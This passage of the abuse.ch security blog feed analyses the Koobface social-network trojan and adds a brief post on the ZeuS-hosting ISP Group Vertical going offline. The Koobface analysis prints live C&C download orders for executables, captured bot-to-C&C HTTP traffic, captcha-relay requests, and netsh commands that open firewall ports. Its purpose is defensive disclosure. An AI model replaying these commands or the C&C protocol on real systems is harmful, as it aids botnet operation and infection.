STARTONCE|http://savecedarcreekpark.com/.sys/?getexe=tw.07.exe<br />
START|http://savecedarcreekpark.com/.sys/?getexe=v2captcha.exe<br />
START|http://savecedarcreekpark.com/.sys/?getexe=v2googlecheck.exe<br />
#CACHE<br />
MD5|ae404c09c11c31900dd72440802b89d9</p>
<p>#SAVED 2009-12-04 06:04:45</p></div>
<p>In this example, the C&#038;C server just sent an order to the infected bot to download more executables. The executables (some kind of &#8220;modules&#8221;) will be downloaded and installed by Koobface. Within 36 hours I just found 13 unique MD5 hashes (=files) are dropped to the infected clients (bots):</p>
<div class="codesnip-container" >v2webserver.exe ce6c3d55759c4ed19ec513313479d2b5 (<a href="http://www.virustotal.com/analisis/6d0c493e1cf7b02e7006d34934a978d9e68fee53b1bf32315f102e35d298451b-1259862488" target="_blank">VT 26/41 (63.41%)</a>)<br />
v2prx.exe ea9173 cc0a85b804e6d7b764deeb0bbf (<a href="http://www.virustotal.com/analisis/ba64acc4cf822561f3fe125a5ff013ea3039b0527b3528aa7f611dd5da1f9dc5-1259949793">VT 37/41 (90.24%)</a>)<br />
v2newblogger.exe 69eff369706bb3e4a077c092e2d7dc3e (<a href="http://www.virustotal.com/analisis/a558f206de11bdf1384e84ddb4f81f70b698bc2ea6552254d34c41b8b1f16972-1259859685">VT 36/41 (87.80%)</a>)<br />
v2googlecheck.exe cf9729bf3969df702767f3b9a131ec2c (<a href="http://www.virustotal.com/analisis/04fa663ae64c87a2fd27c798ebe418a562a5f25f16b21a517310b4aaaa499e6c-1259862484" target="_blank">VT 39/40 (97.50%)</a>)<br />
v2captcha.exe f2d0dbf1b11c5c2ff7e5f4c655d5e43e (<a href="http://www.virustotal.com/analisis/182b39100706212fad3a7a4399c3a6156595965ad4eb95e3c06e34fbc442cd83-1259862364" target="_blank">VT 39/41 (95.12%)</a>)<br />
pp.12.exe 9bc9652e2e1c633bcbdcf9594956d74c (<a href="http://www.virustotal.com/analisis/399eb2a52de827e8b6f686078b34195ec747825b6633476934c7d8cd4ac063f7-1259796964" target="_blank">VT 25/41 (60.98%)</a>)<br />
go.exe  02dfb635168279394c28ef334b8578b2 (<a href="http://www.virustotal.com/analisis/487bc5ebc08e80f9f4cda7c2766c873494cf3d6e1c8ae255b7faf8ae3676fc7b-1259786018" target="_blank">VT 19/41 (46.34%)</a>)<br />
fb.75.exe b50a54b54e64f87ac1dc5d3efff0662f (<a href="http://www.virustotal.com/analisis/67f0f171b2b24f0c4aa3e4ddd0c0deb0f7545a12dc41129ea3224ad6ff883264-1259812962" target="_blank">VT 29/41 (70.73%)</a>)<br />
tw.07.exe f8b7a8489cc3af7009486d0b1a3a8327 (<a href="http://www.virustotal.com/analisis/d977317d508e940e25c38fbe1d4eafaa3d551bbac5de6fca0abbd2697fc8a3f4-1259968171">VT 36/41 (87.80%)</a>)<br />
tg.14.exe df8e227f797340574a708e91064c2161 (<a href="http://www.virustotal.com/analisis/55a5c0e2ff8b1472d0523da51945b02e9d8822fde13a5d520b5c313535e4aaf8-1259862343" target="_blank">VT 27/41 (65.85%)</a>)<br />
hi.15.exe e94bb0d13a3e0089bf1b3726be5818c9 (<a href="http://www.virustotal.com/analisis/5c84f585f98b1cbcc4cf4d5f8c05e692c23d6a7f8f235c55485874a6a0cb2d91-1259925929" target="_blank">VT 37/41 (90.24%)</a>)<br />
ms.25.exe 040ffef821932d55cea2c81b8f085274 (<a href="http://www.virustotal.com/analisis/56688e66085cb4c8b50213bb58727d62758c4faeae5c1e684b8a3bbcb16e46f2-1259925936" target="_blank">VT 8/40 (20.00%)</a>)<br />
be.18.exe 26d50e9034d5983ae941601207bb50eb (<a href="http://www.virustotal.com/analisis/833fba006784fb03c6d4a0764f74b042f4ba825cc282830e6926551ef4cbe05f-1259925934" target="_blank">VT 30/40 (75.00%)</a>)</div>
<p>Fortunately all binaries have a very good AV detection rate.<br />
Some additional notes: The parameter &#8220;getexe&#8221; will drop a binary from the C&#038;C server down to the client. For example: If you send &#8220;getexe=v2googlecheck.exe&#8221; to the zombie/proxy, the C&#038;C server will check if a file called &#8220;v2googlecheck.exe&#8221; exist in his file repository. If the file does not exist the C&#038;C server will return a empty file.</p>
<p>In the second request the infected computer sends some information about the installed modules to the zombie/proxy (remember: the first request just contained the paramenter &#8220;action&#8221; and &#8220;v&#8221;):</p>
<div class="codesnip-container" >GET /.sys/?action=ldgen&#038;ff=1&#038;a=-256673417&#038;v=15&#038;l=1000&#038;c_fb=0&#038;c_ms=0&#038;c_hi=0&#038;c_tw=0&#038;c_be=0&#038;c_tg=0&#038;c_nl=0&#038;iedef=0 HTTP/1.1<br />
Host: xxxxxx.com<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; )<br />
Content-type: application/x-www-form-urlencoded<br />
Connection: close</div>
<p><strong>*** Koobface captcha breaking infrastructure</strong></p>
<p>Before we start with the modules/plugins which the Koobface trojan drops, we will take a look at the captcha breaking infrastructure used by Koobface. Koobface is using the two backed server to control the captcha breaking process:</p>
<ul>
<li>capthcabreak.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada)</li>
<li>captchastop.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada)</li>
</ul>
<p>The modules involved in the captcha breaking process (v2newblogger.exe and v2captcha.exe) are using these servers. I&#8217;ve create a small chart which will show the Koobface&#8217;s captcha breaking infrastructure:</p>
<p><center><em><a href="http://www.abuse.ch/wp-content/koobface_captchabreaking_infrastructure.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_captchabreaking_infrastructure-300x236.jpg" alt="Koobface captcha breaking infrastructure" title="Koobface captcha breaking infrastructure" width="300" height="236" class="aligncenter size-medium wp-image-2219" /></a>Click to enlarge</em></center></p>
<p>Some words about the way Koobface breaks captchas:</p>
<ul>
<li>The way how Koobface breaks captchas is very sophisticated</li>
<li>The time between grabbing a captcha and breaking it is less than three minutes (most of the time just a few seconds!)</li>
<li>Due to the way how Koobface&#8217;s infrastructure works, it&#8217;s possible to break hunderds of captchas per minute!</li>
<li>In this way it&#8217;s possible to register thousends of fake bit.ly/Blogspot accounts per day</li>
</ul>
<p>Additionally there is a interesting thing on the start page of the two domains used for captcha breaking. The sites are speaking about &#8220;<strong>Captcha Decoder Servis</strong>&#8221; including an contact E-Mail address, which looks like a commercial Captcha breaking service. The Koobface botnet obviously supplies enormous ressources for breaking captchas, like a &#8216;human&#8217; grid computing network, so it would make sense to make part of it commercially available to third parties.</p>
<p><strong>*** Koobface modules / plugins ***</strong><br />
Last but not least let&#8217;s take a look at a couple of Koobface modules dropped by the Command&#038;Control server (C&#038;C). Note that the cybercriminals can drop new files (modules) at any time.</p>
<p><strong>v2prx.exe &#8211; A dnsfilter / dnsblocker module</strong><br />
Before we will take a look at the way this module works, we will look at a intersting relict of the author of this binary. If you look at the strings in the binary <em>v2prx.exe</em> you will find the following lines:</p>
<div class="codesnip-container" >x:\work\softv2\dnsblocker\driver\devctrl.c<br />
c:\WINDDK\inc\ddk\wdm.h<br />
x:\work\softv2\dnsblocker\driver\devtcp.c<br />
x:\work\softv2\dnsblocker\driver\devudp.c<br />
x:\work\softv2\dnsblocker\driver\addr.c<br />
x:\work\softv2\dnsblocker\driver\tcpconn.c<br />
x:\work\softv2\dnsblocker\driver\tcprecv.c<br />
x:\work\softv2\dnsblocker\driver\tcpsend.c<br />
x:\work\softv2\dnsblocker\driver\udprecv.c<br />
x:\work\softv2\dnsblocker\driver\udpsend.c<br />
x:\work\softv2\dnsblocker\driver\packet.c<br />
x:\work\softv2\dnsblocker\driver\ctrlio.c<br />
x:\work\softv2\dnsblocker\driver\objchk_wxp_x86\i386\FIO32.pdb</div>
<p>These are relicts of the authors complier. You can also see that he used the Microsoft&#8217;s Windows Driver Kit (<a href="http://www.microsoft.com/whdc/devtools/wdk/default.mspx" target="_blank">WDK</a>).</p>
<p>The module will create two SYS-Files in the sysem32 directory:</p>
<div class="codesnip-container" >C:\WINDOWS\system32\drivers\fio32.sys<br />
C:\WINDOWS\system32\fio32.sys</div>
<p>Afterwards he connects to a Command&#038;Control server at  ze-biz.com (85.13.236.154 &#8211; COREIX-UK-AS Coreix Limited London):</p>
<div class="codesnip-container" >GeT /v50/?v=97&#038;s=I&#038;uid=-256673417&#038;p=1000&#038;q= HttP/1.0<br />
HoST: 85.13.236.154<br />
UsER-AgENt:</div>
<p>Notice the spelling of the strings in the HTTP header (case senstivie). The C&#038;C server will tell the module which domains he should filter/block and which HTTP request he have to redirect to the Command&#038;Control server.</p>
<p><strong>v2webserver.exe &#8211; A simple webserver used to spread Koobface</strong><br />
This module will turn the victims computer into a webserver. A very interesting thing is the fact that this binary won&#8217;t be dropped to every bot. For comparison: The captcha breaking module (<strong>v2captcha.exe</strong>) has been dropped to my test script <strong>419 times</strong> while I have seen <strong>v2webserver.exe</strong> just <strong>197</strong> times. Conclusion: Not every bot will be transformed in a &#8220;zombie&#8221; (which would be used by Koobface&#8217;s infection process <strong>Stage 4</strong>).</p>
<p>The module will install it self in the <em>Program Files</em> directory&#8230;.</p>
<div class="codesnip-container" >C:\Program Files\webserver\webserver.exe</p>
<p>File: webserver.exe<br />
File size: 13312 bytes<br />
MD5   : ce6c3d55759c4ed19ec513313479d2b5<br />
VT: <a href="http://www.virustotal.com/de/analisis/6d0c493e1cf7b02e7006d34934a978d9e68fee53b1bf32315f102e35d298451b-1259862488" target="_blank">26/41 (63.41%)</a></div>
<p>&#8230;and will try to open port 80 (HTTP) and port 53 (DNS) on the Windows Firewall by using the following commands:</p>
<div class="codesnip-container" >netsh firewall add portopening TCP 53 webserver.exe ENABLE<br />
netsh firewall add portopening TCP 80 webserver.exe ENABLE<br />
netsh add allowedprogram &#8220;procname.exe&#8221; webserver.exe ENABLE</div>
<p>Afterwards the module will try to look up aol.com and www.imageshack.com. If the request is successful, he will ping the IP address of aol.com (207.200.74.38) and www.imageshack.com (64.202.189.170). The module will detect the response time of the PING packed sended to aol and imageshack and will report it to the Koobface Command&#038;Control server:</p>
<div class="codesnip-container" >POST /webserver/?uptime=3&#038;v=0&#038;sub=60&#038;<strong>ping=114</strong>&#038;proxy=0&#038;hits=0 HTTP/1.0<br />
Host: uuu20091124.info<br />
Content-Type: binary/octet-stream<br />
Content-Length: 0</div>
<p>Additionally the module also reports the Clients uptime and how many hits the webserver had. If you now check the client port 80 you will see the following code:</p>
<pre>
<div class="codesnip-container" >
<div class="html4strict codesnip" style="font-family:monospace;">Page moved <span class="sc2">&lt;<a href="http://december.com/html/4/element/a.html"><span class="kw2">a</span></a> <span class="kw3">href</span><span class="sy0">=</span><span class="st0">&quot;#&quot;</span> <span class="kw3">onclick</span><span class="sy0">=</span><span class="st0">&quot;javascript:location.reload();return false;&quot;</span>&gt;</span>here<span class="sc2">&lt;<span class="sy0">/</span><a href="http://december.com/html/4/element/a.html"><span class="kw2">a</span></a>&gt;</span>.
<span class="sc2">&lt;<a href="http://december.com/html/4/element/script.html"><span class="kw2">script</span></a>&gt;</span>setTimeout('location.reload()', 1000)<span class="sc2">&lt;<span class="sy0">/</span><a href="http://december.com/html/4/element/script.html"><span class="kw2">script</span></a>&gt;</span></div>
</div>
</pre>
<p>Et Voilà &#8211; the computer can now be used as zombie/proxy in <em>Koobface&#8217;s Command&#038;Control server infrastructure</em> and as server in the <strong>fourth stage </strong> in <em>Koobface&#8217;s infection process</em>.</p>
<p><strong>v2newblogger.exe &#8211; A module to create new Blogspot URLs (Google)</strong><br />
The module v2newblogger.exe will try to create new Blogspot&#8217;s URLs. Let&#8217;s see how this works.</p>
<p>Initially the module tries to connect to news.google.com (requesting the &#8220;Top Stories&#8221; RSS feed):</p>
<div class="codesnip-container" >GET /news?ned=us&#038;output=rss HTTP/1.1<br />
Accept: */*<br />
UA-CPU: x86<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)<br />
Host: news.google.com<br />
Connection: Keep-Alive</div>
<p>It uses title and content of the <em>Top story</em> later to create a post on Google blogspot. In the next step the module will call the Command&#038;Control server capthcabreak.com (67.212.69.230 &#8211; Netelligent Hosting Services Inc. Canada) and will request a username which the module will use for blogspot.com</p>
<div class="codesnip-container" >GET /blogspot/newblogger.php?a=names&#038;ver=12 HTTP/1.0<br />
Host: capthcabreak.com<br />
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2<br />
Connection: close</div>
<p>The C&#038;C server will response with a random firstname, lastname and a username:</p>
<div class="codesnip-container" >HTTP/1.1 200 OK<br />
Server: Apache/1.3.41 (Unix)<br />
Connection: close<br />
Content-Type: text/html</p>
<p>Ursdilla<br />
Knous<br />
KnousUrsdilla</p></div>
<p>In the next step the module calls mail.google.com/mail/signup to create a new Google Account. The web form is protected by a captcha &#8211; but that is no problem for Koobface: He will grab the captcha (image) and send it to the C&#038;C server:</p>
<div class="codesnip-container" >POST /captcha/?a=save&#038;b=goo HTTP/1.0<br />
Host: capthcabreak.com<br />
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2<br />
Content-Type: binary/octet-stream<br />
Connection: close<br />
Content-Length: 2694</div>
<p>The C&#038;C server will return a task ID for this captcha:</p>
<div class="codesnip-container" >HTTP/1.1 200 OK<br />
Server: Apache/1.3.41 (Unix)<br />
Cache-Control: no-cache<br />
Connection: close<br />
Content-Type: text/html</p>
<p>15611345</p></div>
<p>A few seconds later the module will call the C&#038;C server again and asks the status of the Task ID:</p>
<div class="codesnip-container" >GET /captcha/?a=query&#038;b=goo&#038;id=15611345 HTTP/1.0<br />
Host: capthcabreak.com<br />
User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2<br />
Connection: close</div>
<p>and the C&#038;C server will response with the status of the task (and if available the result of the captcha):</p>
<div class="codesnip-container" >HTTP/1.1 200 OK<br />
Date: Sat, 05 Dec 2009 10:30:34 GMT<br />
Server: Apache/1.3.41 (Unix)<br />
Cache-Control: no-cache<br />
Connection: close<br />
Content-Type: text/html</p>
<p>3|dreamyter</p></div>
<p>The C&#038;C server will return a status code (3) followed by the captcha (dreamyter). Now it&#8217;s possbile for the module to create the account without any problems.</p>
<p><strong>v2googlecheck.exe &#8211; A module to check Facebook for blocked URLs</strong><br />
OK this module is REALLY interesting &#8211; it is used to check if a Blogspot or bit.ly URL is blocked at Facebook. Some background information: If you see a URL on Facebook and you think its malicious you can report it to Facebook. Facebook will then check if the URL is malicious. If so, Facebook will block the URL:</p>
<p><center><em><a href="http://www.abuse.ch/wp-content/facebook_blocks_koobfaceurls.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/facebook_blocks_koobfaceurls-300x185.jpg" alt="Facebook blocks Koobface URLs" title="Facebook blocks Koobface URLs" width="300" height="185" class="aligncenter size-medium wp-image-2199" /></a>(click to enlarge)</em></center></p>
<p>To react against this &#8220;problem&#8221;, the Koobface gang drops the binary &#8220;v2googlecheck.exe&#8221;.<br />
First of all the module will report its version to the Koobface C&#038;C (capthcabreak.com):</p>
<div class="codesnip-container" >GET /check/in.php?v=7 HTTP/1.1<br />
Accept: */*<br />
UA-CPU: x86<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)<br />
Host: capthcabreak.com<br />
Connection: Keep-Alive</div>
<p>The C&#038;C server will answer the with a Blogspot or bit.ly URL :</p>
<div class="codesnip-container" >HTTP/1.1 200 OK<br />
Server: Apache/1.3.41 (Unix)<br />
Cache-Control: no-cache<br />
Connection: close<br />
Transfer-Encoding: chunked<br />
Content-Type: text/html</p>
<p>28 </p>
<p>http://kaileywali.blogspot.com/</p>
<p>191720</p>
<p>0</p></div>
<p>The C&#038;C server answers with a Blogspot or bit.ly URL and a Task ID (191720)<br />
Now the module will check if the URL is blocked on Facebook by calling a script called <em>l.php</em> located on facebook.com:</p>
<div class="codesnip-container" >GET /l.php?u=http%3A%2F%2Fkaileywali.blogspot.com%2F HTTP/1.1<br />
Accept: */*<br />
UA-CPU: x86<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)<br />
Host: www.facebook.com<br />
Connection: Keep-Alive</div>
<p>If the blogspot URL is blocked by Facebook, Facebook will return a error page (as seen before). Otherwise the request will be redirected to the blogpost URL. Anyway, the module will save the response body from Facebook and will send it back to the C&#038;C server:</p>
<div class="codesnip-container" >POST /check/blocked.php?v=7&#038;url=http%3A%2F%2Fkaileywali.blogspot.com%2F HTTP/1.1<br />
Accept: */*<br />
Content-Type: binary/octet-stream<br />
UA-CPU: x86<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)<br />
Host: capthcabreak.com<br />
Content-Length: 13551<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache</div>
<p>A few seconds later the module will check the status of his previous submission by calling the C&#038;C server using the Trask ID he recived from the C&#038;C server before (191720):</p>
<div class="codesnip-container" >POST /check/out.php?v=7 HTTP/1.1<br />
Accept: */*<br />
Content-Type: binary/octet-stream<br />
UA-CPU: x86<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)<br />
Host: capthcabreak.com<br />
Content-Length: 9<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache</p>
<p>191720</p></div>
<p>The C&#038;C will answer with 0 which will close/finish the task.</p>
<p><strong>v2captcha.exe &#8211; The captcha breaking module</strong><br />
This module will frequently call the C&#038;C server for new captchas to break. The request which the module sends to the C&#038;C server looks like this:</p>
<div class="codesnip-container" >GET /captcha/?a=get&#038;i=0&#038;v=14 HTTP/1.1<br />
Accept: */*<br />
UA-CPU: x86<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)<br />
Host: capthcabreak.com<br />
Connection: Keep-Alive</div>
<p>The C&#038;C server will check if he has a captcha to break. If not, the C&#038;C server just return <strong>0</strong>, otherwise the C&#038;C server will return a Task ID and a captcha which the bot have to break:</p>
<div class="codesnip-container" >HTTP/1.1 200 OK<br />
Date: Sat, 05 Dec 2009 11:37:51 GMT<br />
Server: Apache/1.3.41 (Unix)<br />
Cache-Control: no-cache<br />
Connection: close<br />
Transfer-Encoding: chunked<br />
Content-Type: text/html</p>
<p>95<br />
11623014|http://captcha.com/captcha/tmp/11623014.jpg|Enter both words below, separated by a space.|([a-zA-Z0-9\$\.\,\/]+)([ ]+)([a-zA-Z0-9\$\.\,\/]+)<br />
0</p></div>
<p>The module will request the captcha-image from the server (captcha.com) and will freez the computer screen with the message <strong>&#8220;Type the characters you see in the picture below&#8221;</strong>. To unlock the screen, the user must enter the captcha served by Koobface:</p>
<p><center><em><a href="http://www.abuse.ch/wp-content/koobface_captcha_breaking.jpg" target="_blank"><img src="http://www.abuse.ch/wp-content/koobface_captcha_breaking-300x227.jpg" alt="Koobface captcha breaking module" title="Koobface captcha breaking module" width="300" height="227" class="aligncenter size-medium wp-image-2203" /></a>Click to enlarge</em></center><br />
Sure, Koobface don&#8217;t know the solution of the captcha, so you can submit a wrong result. But Koobface will check at least the lenght of your submission. If the user enter the result of the captcha, the module will send it back to the C&#038;C server including the Task ID retrived from the C&#038;C server before:</p>
<div class="codesnip-container" >GET /captcha/?a=put&#038;id=191720&#038;v=14&#038;code=misterwis%20schole HTTP/1.1<br />
Accept: */*<br />
UA-CPU: x86<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)<br />
Host: capthcabreak.com<br />
Connection: Keep-Alive</div>
<p><strong>*** Conclusion ***</strong><br />
In most case the binaries dropped by Koobface have a very good AV detection rate. However the Koobface trojan has some sophisticated tricks to spear it self. It is the first &#8220;big&#8221; trojan which uses social networks to spread itself. So it comes to the question if social networks are threats for corporate networks and if they should ban social networks out of the office.</p>
<p>Another problem is the module which is checking if a blogspot / bit.ly URL is already blocked on facebook. The Koobface gang knows how many faked URLs are currently active and how many are banned from Facebook. So its nearly usless to ban the fake URLs from Facebook and try to suspend/delete the involved blogspot / bit.ly URLs: Koobface just need a few minutes to react and create new fake blogpost / bit.ly URLs which Koobface can use in its infection process.</p>
<p>Another point is the fact, that every one is talking about &#8220;web 2.0&#8243; &#8211; and most people are unawar of web 2.0 threats. As I said before, Koobface is the first big social network trojan &#8211; but I&#8217;m really sure it won&#8217;t be the last one. Trojans which are using web 2.0 to spread themselves don&#8217;t need to care about spam filters and email addresses. They can bypass the corporates (strong) email filter by using web 2.0.</p>
<p>Finally the security industry have to ask itself if captchas are still secure or not. The fact that there already commercial &#8220;Captcha Decoder Servis&#8221; worries me.</p>
<p><strong>*** Domains to block ***</strong><br />
The following domains should be blocked on corporate gateways/firewalls:<br />
<center></p>
<table border="1">
<tr>
<td bgcolor="#CCCCCC"><strong>Domain</strong></td>
<td bgcolor="#CCCCCC"><strong>A reocrd</strong></td>
<td bgcolor="#CCCCCC"><strong>AS number</strong></td>
<td bgcolor="#CCCCCC"><strong>AS name</strong></td>
<td bgcolor="#CCCCCC"><strong>Country</strong></td>
</tr>
<tr>
<td>uuu20091124.info</td>
<td>67.212.78.65</td>
<td>10929</td>
<td>Netelligent Hosting Services Inc.</td>
<td>Canada</td>
</tr>
<tr>
<td>captchastop.com</td>
<td>67.212.69.230</td>
<td>10929</td>
<td>Netelligent Hosting Services Inc.</td>
<td>Canada</td>
</tr>
<tr>
<td>capthcabreak.com</td>
<td>67.212.69.230</td>
<td>10929</td>
<td>Netelligent Hosting Services Inc.</td>
<td>Canada</td>
</tr>
<tr>
<td>ze-biz.com</td>
<td>85.13.236.154</td>
<td>31708</td>
<td>COREIX-UK-AS Coreix Limited</td>
<td>United Kingdom</td>
</tr>
</table>
<p></center><br />
<strong>*** Further reading ***</strong></p>
<ul>
<li><a href="http://sunbeltblog.blogspot.com/2009/12/url-shortening-service-bitly-will-check.html" target="_blank">Sunbelt Blog: URL-shortening service Bit.ly will check links for malcode </a></li>
<li><a href="http://voices.washingtonpost.com/securityfix/2009/12/bitly_to_scour_shortened_links.html" target="_blank">Security Fix: Bit.ly to scour shortened links for badness</a></li>
<li><a href="http://en.wikipedia.org/wiki/Koobface" target="_blank">Wikipedia: Koobface</li>
</ul>
<div class='bookmarkify'><a name='bookmarkify'></a><div class='title' title='Use these links to share this page with others'>Bookmark, tagg it or email it to a friend:</div><div class='linkbuttons'><a href='http://www.bloglines.com/sub/http://www.abuse.ch/?p=2103' title='Save to Bloglines' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/bloglines.png' style='width:16px; height:16px;' alt='[Bloglines] ' /></a> <a href='http://del.icio.us/post?url=http://www.abuse.ch/?p=2103&amp;title=Koobface &#8211; the social network trojan' title='Save to del.icio.us' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/delicious.png' style='width:16px; height:16px;' alt='[del.icio.us] ' /></a> <a href='http://digg.com/submit?phase=2&amp;url=http://www.abuse.ch/?p=2103&amp;title=Koobface &#8211; the social network trojan' title='Digg It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/digg.png' style='width:16px; height:16px;' alt='[Digg] ' /></a> <a href='http://www.facebook.com/share.php?u=http://www.abuse.ch/?p=2103' title='Save to Facebook' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/facebook.png' style='width:16px; height:16px;' alt='[Facebook] ' /></a> <a href='http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http://www.abuse.ch/?p=2103&amp;title=Koobface &#8211; the social network trojan' title='Save to Google Bookmarks' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/google.png' style='width:16px; height:16px;' alt='[Google] ' /></a> <a href='http://www.mister-wong.com/index.php?action=addurl&amp;bm_url=http://www.abuse.ch/?p=2103&amp;bm_description=Koobface &#8211; the social network trojan' title='Save to Mister Wong' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/misterwong.png' style='width:16px; height:16px;' alt='[Mister Wong] ' /></a> <a href='http://www.myspace.com/Modules/PostTo/Pages/?c=http://www.abuse.ch/?p=2103&amp;t=Koobface &#8211; the social network trojan' title='Save to MySpace' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/myspace.png' style='width:16px; height:16px;' alt='[MySpace] ' /></a> <a href='http://slashdot.org/bookmark.pl?url=http://www.abuse.ch/?p=2103&amp;title=Koobface &#8211; the social network trojan' title='Slashdot It!' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/slashdot.png' style='width:16px; height:16px;' alt='[Slashdot] ' /></a> <a href='http://technorati.com/faves?add=http://www.abuse.ch/?p=2103' title='Add to my Technorati Favorites' onclick='target="_blank";' rel='nofollow'><img src='http://www.abuse.ch/wp-content/plugins/bookmarkify/technorati.png' style='width:16px; height:16px;' alt='[Technorati] ' /></a>  <a title='See more bookmark and sharing options...' href='http://www.abuse.ch/?p=2103#bookmarkify' rel='nofollow'><small>More&nbsp;&raquo;</small></a></div></div>
<p><a href="http://feedads.g.doubleclick.net/~a/oUQAGYv47HysiHjAhBtQkwIGG-g/0/da"><img src="http://feedads.g.doubleclick.net/~a/oUQAGYv47HysiHjAhBtQkwIGG-g/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/oUQAGYv47HysiHjAhBtQkwIGG-g/1/da"><img src="http://feedads.g.doubleclick.net/~a/oUQAGYv47HysiHjAhBtQkwIGG-g/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Abusech/~4/FLIFjcqioa0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.abuse.ch/?feed=rss2&amp;p=2103</wfw:commentRss>
		<slash:comments>14</slash:comments>
		<feedburner:origLink>http://www.abuse.ch/?p=2103</feedburner:origLink></item>
		<item>
		<title>Well known ZeuS hosting ISP “Group Vertical” offline</title>
		<link>http://feedproxy.google.com/~r/Abusech/~3/A5243c-s2_4/</link>
		<comments>http://www.abuse.ch/?p=2060#comments</comments>
		<pubDate>Wed, 28 Oct 2009 19:15:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Monitoring & Reporting]]></category>
		<category><![CDATA[ZeuS Tracker]]></category>
		<category><![CDATA[AS49365]]></category>
		<category><![CDATA[Group Vertical Ltd]]></category>

		<guid isPermaLink="false">http://www.abuse.ch/?p=2060</guid>
		<description><![CDATA[A week ago I wrote a post about the well known rogue ISP Group Vertical (see &#8220;Source of badness: Group Vertical Ltd (AS49365)&#8221;) which was top ZeuS hosting ISP over several month. 
Today I took a look at the ZeuS statistics on the ZeuS Tracker and I was really suprised:

As you can see on the [...]]]></description>
			<content:encoded><![CDATA[<p>A week ago I wrote a post about the well known rogue ISP Group Vertical (see <a href="http://www.abuse.ch/?p=2024" target="_blank">&#8220;Source of badness: Group Vertical Ltd (AS49365)&#8221;</a>) which was top ZeuS hosting ISP over several month. </p>
<p>Today I took a look at the ZeuS statistics on the <a href="https://zeustracker.abuse.ch" target="_blank" title="abuse.ch ZeuS Tracker">ZeuS Tracker</a> and I was really suprised:</p>
<p><a href="http://www.abuse.ch/wp-content/ZeuShostsaftercutoffAS49365.png" target="_blank"><img src="http://www.abuse.ch/wp-content/ZeuShostsaftercutoffAS49365-300x96.png" alt="Number of ZeuS hosts after cut off AS49365" title="Number of ZeuS hosts after cut off AS49365" width="300" height="96" class="aligncenter size-medium wp-image-2085" /></a></p>
<p>As you can see on the statistic above the number of active ZeuS Command&#038;Control servers (C&#038;C) had a big decreas on the 26th october 2009. My first thought was that there maybe was a problem with the ZeuS Tracker script. But after I tooked a look at the top ZeuS hosting ISPs on the ZeuS Tracker, I saw that <strong>all</strong> ZeuS Command&#038;Control servers in the subnet of <strong>Group Vertical (AS49365)</strong> are offline. Finally I took a look at the CIDR Report for <strong>AS49365</strong> and I was happy to see that this rogue AS is no longer being announced in the global BGP table:</p>
<div class="codesnip-container" >Report for AS49365<br />
Name <strong>GR-VERTICAL-AS Group Vertical Ltd</strong></p>
<p>NOT Announced</p>
<p>This AS is not currently used to announce prefixes in the global routing table, nor is it used as a visible transit AS.<br />
Prefixes added and withdrawn by this origin AS in the past 7 days.</p>
<p>- 91.212.220.0/24             <strong>Withdrawn</strong></div>
<p>Source: <a href="http://www.cidr-report.org/cgi-bin/as-report?as=AS49365" target="_blank">CIDR report for AS49365</a></p>
<p>So I guess that the Russian upstream provider <a href="http://www.fiord.ru/" target="_blank">Fiord</a> has cut off their peers to the rogue ISP <strong>Group Vertical</strong> on 26th october 2009. As e result of this, Group Vertical lost their internet connection and the number of active ZeuS Command&#038;Control servers (C&#038;C) dropped rapidly from <strong>190</strong> down to <strong>148</strong> world wide &#8211; That&#8217;s more than 40 ZeuS Command&#038;Control server which are now no longer reachable from the internet!</p>
<p>McColo&#8230; Ural Industrial Company&#8230; Real Host&#8230; Group Vertical&#8230; Who&#8217;s next? <img src='http://www.abuse.ch/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> </p>
